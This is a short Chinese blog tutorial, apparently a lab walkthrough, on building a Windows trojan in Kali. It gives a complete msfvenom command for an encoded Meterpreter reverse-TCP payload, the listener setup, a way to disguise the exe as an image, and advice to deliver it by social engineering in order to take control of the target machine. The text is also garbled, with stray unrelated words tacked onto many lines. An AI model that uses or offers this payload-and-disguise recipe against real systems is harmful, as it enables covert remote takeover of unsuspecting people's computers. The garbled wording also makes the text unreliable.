漏洞复现:使用Kali制做木马程序windows
攻击机:Kali2019tcp
靶机:Win7 64位spa
攻击步骤:3d
1.打开Kali2019和Win7 64位虚拟机,肯定IP地址在一个网段blog
2.肯定好IP地址,进入Kali2019进行木马文件.exe制做,命令以下图片
命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe虚拟机
备注:咱们选择的靶机是Win7 64位,因此兼容性必定要设置好,不然会出错it
3.接下来打开msf,编辑远程模块,设置payload,具体流程看图io
4.开始设置Payload信息,输入show options查看,lhost和lport都要设置成exe文件中设置的地址和端口号兼容性
5.输入exploit开始运行监听模块,开始监听
6.把刚刚生成的pink程序经过压缩合并,制做一个图片exe文件,经过社工或者其余方法上传到win7 64位虚拟机中
7.运行这个文件,图片会打开,Kali2019会收到链接成功的提示
8.成功获取win7权限,渗透成功